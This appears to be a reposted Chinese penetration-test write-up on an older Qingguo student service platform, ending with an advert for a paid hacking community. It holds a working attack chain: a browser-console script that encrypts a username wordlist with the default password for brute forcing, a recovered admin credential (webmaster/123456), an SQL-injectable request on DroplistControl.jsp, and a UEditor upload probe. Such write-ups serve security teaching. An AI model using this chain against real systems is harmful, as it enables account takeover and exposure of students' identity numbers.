本文只结合实际渗透测试时候遇到的漏洞进行案例分析,请勿用于非法用途。该漏洞只存在于老版本的学生服务管理平台中,如果无法利用则系统已安装升级的补丁安装包。
首先遇到登录框
输入用户名密码,点击登录以后会抓到一个如下登录数据包:
请求路径为/log_in,传参为加密的param(param是区分老版本和新版本的条件,如果传参为分开的username和password,则无法利用该漏洞)
param参数明显加密了,但是加解密方法写在前端js当中。
观察系统的js,在loginbar.js中,写明了参数加密的方法是xs_strEnccs,参数格式为:'username='+username+'&password='+password+'&rootsrc=3'
继续追踪方法,发现xs_strEnccs又调用了strEnc方法。而解密参数的方法名称为xs_strDec
至此暂时缓一缓,点击找回密码跳转到其他页面
跳转到该页面中,在找回密码页面可以找到strEnc方法,可以发现是之前加密方法的解密方法
至此一套完整的加密解密方法都理清楚了,登录时候也没有验证码,可以构造用户名不唯一,密码默认为123456进行弱口令爆破。比如:
username=xxx&password=123456&rootsrc=3
然后直接在浏览器控制台里面调用现成的加密方法,输出加密的param
const usernames = ["admin", "test", "test01", "test1", "test2", "weblogic", "ftp", "manager", "manage", "user", "guest", "administrator",
"account", "super", "superuser", "master", "imap", "memcached", "mongodb", "oracle", "pop3", "postgresql", "rdp",
"redis", "smb", "smtp", "sqlserver", "ssh", "svn", "telnet", "tomcat", "vnc", "xiaomi", "huawei", "apple", "topsec",
"360", "qihoo", "1688", "aliyun", "alipay", "www", "web", "webadmin", "webmaster", "anonymous", "jboss", "1", "admin1",
"root", "sever", "system", "develop", "developer", "developers", "development", "demo", "device", "devserver", "devsql",
"0", "01", "02", "03", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "2", "20", "3", "3com", "4", "5",
"6", "7", "8", "9", "ILMI", "a", "zhangwei", "wangwei", "wangfang", "liwei", "lina", "zhangmin", "lijing", "wangjing",
"liuwei", "wangxiuying", "zhangli", "lixiuying", "wangli", "zhangjing", "zhangxiuying", "liqiang", "wangmin", "limin",
"wanglei", "liuyang", "wangyan", "wangyong", "lijun", "zhangyong", "lijie", "zhangjie", "zhanglei", "wangqiang", "lijuan",
"wangjun", "zhangyan", "zhangtao", "wangtao", "liyan", "wangchao", "liming", "liyong", "wangjuan", "liujie", "liumin", "lixia",
"lili", "zhangjun", "wangjie", "zhangqiang", "wangxiulan", "wanggang", "wangping", "liufang", "liuyan", "liujun", "liping",
"wanghui", "chenjing", "liuyong", "liling", "liguiying", "wangdan", "ligang", "lidan", "wangpeng", "liutao", "chenwei",
"zhanghua", "liujing", "litao", "wangguiying", "zhangxiulan", "lihong", "lichao", "liuli", "zhangguiying", "wangyulan",
"zhangpeng", "lixiulan", "zhangchao", "wangling", "zhangling", "lihua", "wangfei", "zhangyulan", "wangguilan", "wangying",
"liuqiang", "chenxiuying", "liying", "lihui", "limei", "chenyong", "wang", "lifang", "zhangguilan", "libo", "yangyong",
"wangxia", "liguilan", "wangbin", "lipeng", "zhangping", "zhanghui", "zhangyu", "liuju", "xujing", "yanghong", "yangziwen", "zhangshulan", "zhangwen", "chenguilan", "zhouli", "lishuhua", "chen", "machao",
"liujianguo", "liguihua", "wangfenglan", "lishulan", "chenxiuzhen"
];
for (let i = 0; i < usernames.length; i++) {
const result = 'username='+usernames[i]+'&password=123456&rootsrc=3'
const result2 = xs_strEnccs(result);
console.log(result2);
}
之后将登录的数据包直接转发到burp的intruder中替换爆破即可
状态码为537时,显示登录成功,此时的param为
2D54C345E9883022B05FA18CDC024536EE4A58B6C5BBA9449ED0BAF1115B734923153A77E0449A6FC2CF1D90227EB5EE4D4C437553E62E12CA570C1934CE6FCC5D98631EB611684F6853A618AFAAF53267ADABEF2D9C279B
解密弱口令如下:
webmaster/123456
但是直接输入账号webmaster/123456登录会报错,因为少传了个参数rootsrc=3
所以登录时抓包,再替换数据包里面的param为2D54C345E9883022B05FA18CDC024536EE4A58B6C5BBA9449ED0BAF1115B734923153A77E0449A6FC2CF1D90227EB5EE4D4C437553E62E12CA570C1934CE6FCC5D98631EB611684F6853A618AFAAF53267ADABEF2D9C279B,放包以后就能正常登录
以webmaster登录成功进入后台
能够获得所有学生的学号和身份证号,接下来就是后台漏洞挖掘了。
登录成功webmaster后,可以发现一个后台接口存在注入(仅限管理员可以访问,测试学生无法访问)
GET /taglib/DroplistControl.jsp?classname=1&flag=databook HTTP/1.1
Host: xxxx
sec-ch-ua-platform: "Windows"
Connection: keep-alive
Accept: */*
Sec-Fetch-Site: same-origin
sec-ch-ua-mobile: ?0
Sec-Fetch-Mode: cors
Cookie: JSESSIONID=BDBE5E5377D3F5FC827DA999BB63F65F
sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
参数classname存在注入
翻阅js后,又发现一个jsp版本的Ueditor组件
路径藏得有点深,在/ueditor143/jsp目录下
访问如下地址进行测试是否有白名单可以上传
/ueditor143/jsp/controller.jsp?action=uploadfile&encode=utf-8
没有xml这种支持的文件格式,所以无法利用文件上传xss,只能查看之前上传的文件是否有敏感信息
文末福利
0x01 社区简介
社区中包含有主要讲解系统化从基础入门到实战漏洞挖掘的教程,其中包含团队自整的挖掘注意点和案例。其中还包含分享的渗透经验、SRC漏洞案例、代码审计、挖洞思路等高价值资源。
一整套小白挖洞入门课程,帮你从0开始夯实基础
带你由浅入深入门挖洞!
●帮会课程将分为五部分,每部分都会以笔记干货的形式在帮会中更新。
●笔记主要根据漏洞原理,结合实战的漏洞案例,分析漏洞的挖掘方法和漏洞成因。
历史笔记部分一览
0x02 独有服务
1. 各类内部网络安全攻防、CTF比赛信息、挖洞工具、靶场资源;
2. 专题更新漏洞挖掘中的小Tips及实战案例
3. 攻防思维导图,0基础开启网络安全学习之路;
4. 遇到任何技术题都快速提问与讨论交流的思路;
5. 内部CTF大佬、海外SRC漏洞挖掘大佬、群主群内在线解答;
6. 组织队伍参与各类SRC挖掘活动;
0x03 团队交流群
0x04 帮会技术保证
帮主:chobits02
●「安全渗透感知大家族」的帮主
●安全团队Code4th建立人
●资深安全专家,2年网安经验,1.5年后端开发经验
●拥有丰富的SRC挖掘、应急响应、安全运营、网络攻防等方面经验
0x05 加入方式
FreeBuf知识大陆2周年庆啦
现 在 49.9 元 享 永 久 会 员!
优惠机会难得,扫二维码加入吧
⬇️
现在加入还能赢取黑神话悟空一份
扫描下方二维码进行抽奖~
END
关注Code4th安全团队
了解更多安全相关内容~
原文始发于微信公众号(Code4th安全团队):渗透实战指南 - 青果软件学生服务管理平台
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论